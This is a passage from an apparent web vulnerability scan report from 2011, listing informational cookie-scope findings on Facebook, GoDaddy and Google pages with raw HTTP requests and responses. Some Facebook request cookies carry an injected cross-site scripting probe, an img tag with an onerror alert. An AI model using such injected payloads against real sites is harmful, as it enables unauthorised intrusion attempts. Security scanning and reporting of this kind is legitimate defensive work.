Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.103. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.104. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=Mkkns; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.106. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.107. https://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.108. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • made_write_conn=1304595854; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
  • W=1304595854; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.109. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.110. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
  • BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

10.112. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


10.113. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


10.114. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
